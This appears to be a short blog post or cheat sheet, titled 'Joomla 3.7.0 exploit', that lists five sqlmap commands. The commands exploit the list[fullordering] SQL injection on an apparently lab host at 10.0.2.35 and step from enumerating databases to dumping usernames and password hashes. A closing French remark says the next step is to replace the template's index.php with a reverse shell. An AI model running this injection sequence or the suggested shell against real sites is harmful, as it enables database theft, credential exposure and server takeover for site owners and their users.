Joomla 3.7.0 exploit

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found --tables -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' --columns -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' -C username --dump -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml'--risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' -C password --dump -p list[fullordering]

le mot de passe trouvé est un hash bcrypt

on peut maintenant modifier le index.php du template par un reverse shell

Leave a Reply